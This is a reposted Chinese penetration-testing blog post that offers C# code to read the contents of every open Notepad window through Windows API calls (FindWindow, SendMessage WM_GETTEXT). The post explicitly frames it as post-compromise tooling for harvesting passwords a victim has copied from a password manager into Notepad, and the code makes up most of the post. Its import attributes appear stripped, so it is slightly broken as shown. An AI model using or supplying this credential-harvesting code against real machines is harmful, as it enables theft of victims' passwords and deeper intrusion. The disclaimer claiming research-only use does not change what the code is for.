几年没管,今日复活,c#获取notepad++内容,
用途:控了对方机器后,对方密码在keepass这种类型的密码管理器中,但你不知道密码,恰巧对方把密码复制到了记事本中(notepad.exe),但是你又不能登录对方远程桌面,可以用这种方式来获取内容:
using System;using System.Collections.Generic;using System.Text;using System.IO;using System.Runtime.InteropServices;namespace ConsoleApp5{class Program{static void Main(string[] args){Console.WriteLine(GetAll());}// Token: 0x06000001 RID: 1[]public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount);// Token: 0x06000002 RID: 2[]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);// Token: 0x06000003 RID: 3[]public static extern int SendMessage(IntPtr hWnd, int msg, int Param, StringBuilder text);// Token: 0x06000004 RID: 4[]public static extern IntPtr FindWindowEx(IntPtr hwndParent, IntPtr hwndChildAfter, string lpszClass, string lpszWindow);// Token: 0x06000005 RID: 5 RVA: 0x00002050 File Offset: 0x00000250public static string GetAll(string aa = null){List<string> list = new List<string>();IntPtr intPtr = FindWindow("notepad", null);MemoryStream memoryStream = new MemoryStream();BinaryWriter binaryWriter = new BinaryWriter(memoryStream);while (intPtr != IntPtr.Zero){IntPtr hWnd = FindWindowEx(intPtr, IntPtr.Zero, "edit", null);StringBuilder stringBuilder = new StringBuilder(104857600);int num = SendMessage(hWnd, 13, stringBuilder.Capacity, stringBuilder);binaryWriter.Write(stringBuilder.ToString() + "rn---------------------------------------------------rn");intPtr = FindWindowEx(IntPtr.Zero, intPtr, "notepad", null);}MemoryStream streamz = new MemoryStream(memoryStream.ToArray());BinaryReader rd = new BinaryReader(streamz);return rd.ReadString();}// Token: 0x04000001 RID: 1private const int WM_GETTEXT = 13;// Token: 0x04000002 RID: 2private const int WM_GETTEXTLENGTH = 14;}}
原文始发于微信公众号(渗透攻防笔记):c# 获取notepad.exe内容
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论